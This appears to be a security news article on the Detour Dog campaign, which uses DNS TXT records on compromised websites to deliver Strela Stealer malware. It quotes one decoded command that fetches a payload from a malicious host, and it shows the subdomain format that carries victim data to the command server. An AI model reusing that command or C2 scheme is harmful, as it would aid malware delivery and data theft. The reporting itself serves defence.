Cybersecurity

A newly identified DNS-based malware campaign, referred to as Detour Dog, leverages compromised websites worldwide to deliver the Strela Stealer malware through DNS TXT records. This method represents a significant advancement in malware distribution, utilizing the Domain Name System as both a command-and-control mechanism and a delivery channel.

The campaign affects numerous websites globally, creating a network of infected hosts that communicate with actor-controlled name servers through specially crafted DNS queries. These server-side DNS requests remain undetectable to website visitors, allowing the malicious infrastructure to function covertly.

Infected sites conditionally redirect visitors to malicious content based on geographic location and device type, incorporating a sophisticated filtering mechanism to evade detection. The campaign, initially focused on redirecting users to fraudulent websites, has shifted towards direct malware distribution, targeting European users with the Strela Stealer payload.

Infoblox analysts identified a connection between Detour Dog infrastructure and Strela Stealer operations, discovering that 69 percent of confirmed StarFish staging hosts were under Detour Dog control during the summer of 2025. This indicates active participation in multi-stage malware delivery chains aimed at information theft.

Advanced DNS TXT Command and Control Infrastructure

Detour Dog’s DNS-based command and control system exploits DNS TXT record functionality for malware communication. The infected websites generate DNS queries with victim information embedded into the subdomain structure:

<infected-host>.<visitor-ip>.<rand-num>.<type>.c2_domain

An upgrade in spring 2025 added remote code execution capabilities triggered by Base64-encoded responses containing the keyword “down.” This enables compromised websites to function as proxy servers for malware distribution.

The DNS TXT responses facilitate complex multi-stage payload delivery, exemplified by decoded commands like:

downhttp://updatemsdnserver.com/script.php?u=j6cwaj0h67

This command instructs the infected site to retrieve content from a StarFish C2 server and relay it to the victim, forming a distributed delivery network. The system supports both script.php and file.php endpoints, corresponding to different Strela Stealer delivery stages.

When the Shadowserver Foundation sinkholed the webdmonitor.io domain in August 2025, Detour Dog operators quickly established a replacement C2 server, transferring control to the aeroarrows.io domain. Analysis revealed approximately 30,000 unique domains generating DNS TXT queries to the actor-controlled infrastructure.

The operation highlights DNS as a covert communication channel for malware, with the distributed nature of the infected network and legitimate DNS traffic appearance creating challenges for traditional security monitoring systems. This represents a significant advancement in malware distribution techniques, utilizing DNS infrastructure as both a command channel and content delivery mechanism.